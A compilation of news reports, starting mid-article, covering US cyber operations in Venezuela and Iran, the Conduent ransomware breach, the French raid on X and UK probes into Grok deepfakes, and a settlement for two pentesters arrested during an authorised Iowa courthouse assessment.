Little has been shared about the command’s role in the ouster of Maduro, however. And while lawmakers received classified briefings on both digital operations last month, they are seeking more information about the digital attacks on Iran and Venezuela, hoping some details will eventually be shared with the public.

Venezuela has “been in the news and a lot of discussion about the fact that this was a good example of what happens when you combine all of the joint forces, including cyber operations,” Sen. Mike Rounds (R-SD), the chair of the Senate Armed Services cyber subcommittee, said during a hearing with defense officials last week.

“I understand that this [setting] is unclassified but there's a lot of folks out there that might now have a curiosity about this, and they may very well want to be a part of a team in the future that you're going to have to try to recruit,” he added.

The officials, for their part, declined to offer any fresh details and instead touted the use of cyber capabilities.

“I would tell you not just [Operation] Absolute Resolve [in Venezuela] but Midnight Hammer, in a number of other operations, we've really graduated to the point where we’re treating a cyber capability just like we would a kinetic capability, not sprinkling cyber on,” Army Lt. Gen. William Hartman, the acting chief of the command and the NSA, told the subcommittee.

Air Force Brig. Gen. Ryan Messer, deputy director for global operations on the Joint Staff, noted that Caine has put an “emphasis on not just traditional kinetic effects, but the role non-kinetic effects play in all of our global operations, especially cyber.”

He said that over the last six months, the Joint Staff has developed a “non-kinetic effects cell” that is “designed to integrate, coordinate and synchronize all of our non-kinetics into the planning and then, of course, the execution of any operation globally.”

In military jargon, “non-kinetic effects” are produced through capabilities like cyber tools, while “kinetic” generally refers to striking targets with missiles or by other physical means.

“The reality is that we’ve now pulled cyber operators to the forefront,” Messer said.

Iran and Venezuela suggest the “ideal use cases for cyber operations as enablers of conventional military operations,” according to Erica Lonergan, an adjunct fellow at the Foundation for Defense of Democracies’ Center on Cyber and Technology Innovation.

“Altogether, both of these operations reflect the routinization of the use of cyber capabilities during military operations, and we should expect to see more of these in the future. In my view, this is a good thing, because it suggests we are moving beyond seeing cyber as a unique, exquisite (and dangerous) capability,” said Lonergan, a former director of the congressionally-mandated Cyberspace Solarium.

“I would not generalize from these cases to make inferences about how this might play out in the context of a contingency involving an adversary like China.”

techcrunch.com
Zack Whittaker
7:25 AM PST · February 5, 2026

The ransomware attack at Conduent allowed hackers to steal a "significant number of individuals’ personal information" from the govtech giant's systems. Conduent handles personal and health data of more than 100 million people across America.

A data breach at government technology giant Conduent appears to affect far more people than first disclosed, with the number of victims potentially stretching to dozens of millions of people across the United States.

The January 2025 ransomware attack, which knocked out Conduent’s operations for several days, is now known to affect at least 15.4 million people in Texas alone, accounting for about half of the state’s population. Conduent said in October that 4 million people across the state were affected.

Another 10.5 million people are affected across Oregon, per the state’s attorney general.

Conduent has also notified hundreds of thousands of people across Delaware, Massachusetts, New Hampshire, and other states, according to data breach notifications seen by TechCrunch.

The stolen data includes individuals’ names, Social Security numbers, medical data, and health insurance information.

One of the largest government contractors today, Conduent handles and processes large amounts of personal and sensitive information on behalf of large corporations, government departments, and several U.S. states. The company says its technology and operational support services reach more than 100 million people in the United States across various government healthcare programs.

When contacted with several questions about the data breach, Conduent spokesperson Sean Collins provided a boilerplate statement that did not address the questions, nor did they answer if Conduent knows how many individuals are affected by the cyberattack. The spokesperson would not say if the breach affects more than 100 million people.

Collins said that the company has been working to “conduct a detailed analysis of the affected files to identify the personal information” taken in the breach but would not say how many data breach notifications the company has sent out to date.

Little else is known about the breach, and the company has disclosed few details. Conduent disclosed the cyberattack in April, months after hackers knocked out the company’s systems, which resulted in outages to government services across the United States.

The Safeway ransomware gang took credit for the breach, claiming to have stolen over 8 terabytes of data.

In a later SEC filing, the company said that the stolen datasets “contained a significant number of individuals’ personal information associated with our clients’ end-users,” referring to its corporate and government customers.

Conduent also said it is continuing to notify individuals whose data was stolen in the breach, and plans to conclude alerting individuals by early 2026. The company did not give a more specific timeline.

bbc.com
Liv McMahon
Technology reporter

Elon Musk's X and Grok platforms are facing increased scrutiny from authorities on both sides of the channel.
The French offices of Elon Musk's X have been raided by the Paris prosecutor's cyber-crime unit, as part of an investigation into suspected offences including unlawful data extraction and complicity in the possession of child sexual abuse material (CSAM).

The prosecutor's office also said both Musk and former X chief executive Linda Yaccarino had been summoned to appear at hearings in April.

In a separate development, the UK's Information Commissioner's Office (ICO) announced a probe into Musk's AI tool, Grok, over its "potential to produce harmful sexualised image and video content."

Writing on X, Musk said the raid was a "political attack".
The company said in a statement that it was "disappointed" but "not surprised," and accused the Paris Public Prosecutor's office of an "abusive act."

X also denied any wrongdoing and said the raid "endangers free speech."

The investigation began in January 2025 when French prosecutors started looking into content recommended by X's algorithm, before being widened in July that year to include Musk's controversial AI chatbot, Grok.

Yaccarino also took to X to accuse French prosecutors of carrying out "a political vendetta against Americans."

"To be clear: they are lying," added Yaccarino, who left the firm last year.

Following Tuesday's raid, French prosecutors say they are now investigating whether X has broken the law across multiple areas.

Among potential crimes it said it would investigate were complicity in possession or organised distribution of CSAM, infringement of people's image rights with sexual deepfakes and fraudulent data extraction by an organised group.

New UK investigation
Meanwhile, UK authorities have given an update on their investigations into sexual deepfakes created by Grok and shared on X.

The images - often made using real images of women without their consent - prompted a barrage of criticism in January from victims, online safety campaigners and politicians.

The company eventually intervened to prevent the practice, after Ofcom and others launched investigations.

In an update on Tuesday, Ofcom said it was continuing to investigate the platform and was treating it as "a matter of urgency".

But it added it was currently unable to investigate the creation of illegal images by Grok in this case because it did not have sufficient powers relating to chatbots.

However, shortly afterwards the ICO said it was launching its own probe, in conjunction with Ofcom, into the processing of personal data in relation to the Grok.

"The reports about Grok raise deeply troubling questions about how people's personal data has been used to generate intimate or sexualised images without their knowledge or consent, and whether the necessary safeguards were put in place to prevent this," said William Malcolm, the ICO's executive director for regulatory risk & innovation.

In late January, the European Commission announced an investigation into its parent company xAI over concerns about the images.

A Commission spokesperson said it was in touch with France over its search of X's office in Paris.

'Not a free country'
Pavel Durov - founder of the messaging app Telegram - criticised the French authorities on Tuesday, accusing France of being "the only country in the world that is criminally persecuting all social networks that give people some degree of freedom".

"Don't be mistaken: this is not a free country," he added in a post on X.

Durov was arrested and detained in France in August 2024 over alleged moderation lapses on his messaging app, which the Paris prosecutor's office said had failed to curb criminal activity.

He was permitted to leave the country last March after the platform made some changes to the way it operates following the arrest.

These included sharing some user data with authorities in response to legal requests.

arstechnica.com - Ars Technica
Dan Goodin – 29 janv. 2026 19:30

Settlement comes more than 6 years after Gary DeMercurio and Justin Wynn's ordeal began.

Two security professionals who were arrested in 2019 after performing an authorized security assessment of a county courthouse in Iowa will receive $600,000 to settle a lawsuit they brought alleging wrongful arrest and defamation.

The case was brought by Gary DeMercurio and Justin Wynn, two penetration testers who at the time were employed by Colorado-based security firm Coalfire Labs. The men had written authorization from the Iowa Judicial Branch to conduct “red-team” exercises, meaning attempted security breaches that mimic techniques used by criminal hackers or burglars.

The objective of such exercises is to test the resilience of existing defenses using the types of real-world attacks the defenses are designed to repel. The rules of engagement for this exercise explicitly permitted “physical attacks,” including “lockpicking,” against judicial branch buildings so long as they didn’t cause significant damage.

A chilling message
The event galvanized security and law enforcement professionals. Despite the legitimacy of the work and the legal contract that authorized it, DeMercurio and Wynn were arrested on charges of felony third-degree burglary and spent 20 hours in jail, until they were released on $100,000 bail ($50,000 for each). The charges were later reduced to misdemeanor trespassing charges, but even then, Chad Leonard, sheriff of Dallas County, where the courthouse was located, continued to allege publicly that the men had acted illegally and should be prosecuted.

Reputational hits from these sorts of events can be fatal to a security professional’s career. And of course, the prospect of being jailed for performing authorized security assessment is enough to get the attention of any penetration tester, not to mention the customers that hire them.

“This incident didn’t make anyone safer,” Wynn said in a statement. “It sent a chilling message to security professionals nationwide that helping [a] government identify real vulnerabilities can lead to arrest, prosecution, and public disgrace. That undermines public safety, not enhances it.”

DeMercurio and Wynn’s engagement at the Dallas County Courthouse on September 11, 2019, had been routine. A little after midnight, after finding a side door to the courthouse unlocked, the men closed it and let it lock. They then slipped a makeshift tool through a crack in the door and tripped the locking mechanism. After gaining entry, the pentesters tripped an alarm alerting authorities.

Within minutes, deputies arrived and confronted the two intruders. DeMercurio and Wynn produced an authorization letter—known as a “get out of jail free card” in pen-testing circles. After a deputy called one or more of the state court officials listed in the letter and got confirmation it was legit, the deputies said they were satisfied the men were authorized to be in the building. DeMercurio and Wynn spent the next 10 or 20 minutes telling what their attorney in a court document called “war stories” to deputies who had asked about the type of work they do.

When Sheriff Leonard arrived, the tone suddenly changed. He said the Dallas County Courthouse was under his jurisdiction and he hadn’t authorized any such intrusion. Leonard had the men arrested, and in the days and weeks to come, he made numerous remarks alleging the men violated the law. A couple months after the incident, he told me that surveillance video from that night showed “they were crouched down like turkeys peeking over the balcony” when deputies were responding. I published a much more detailed account of the event here. Eventually, all charges were dismissed.

DeMercurio and Wynn sued Dallas County and Leonard for false arrest, abuse of process, defamation, intentional infliction of emotional distress, and malicious prosecution. The case dragged on for years. Last Thursday, five days before a trial was scheduled to begin in the case, Dallas County officials agreed to pay $600,000 to settle the case.

It’s hard to overstate the financial, emotional, and professional stresses that result when someone is locked up and repeatedly accused of criminal activity for performing authorized work that’s clearly in the public interest. DeMercurio has now started his own firm, Kaiju Security.

“The settlement confirms what we have said from the beginning: our work was authorized, professional, and done in the public interest,” DeMercurio said. “What happened to us never should have happened. Being arrested for doing the job we were hired to do turned our lives upside down and damaged reputations we spent years building.”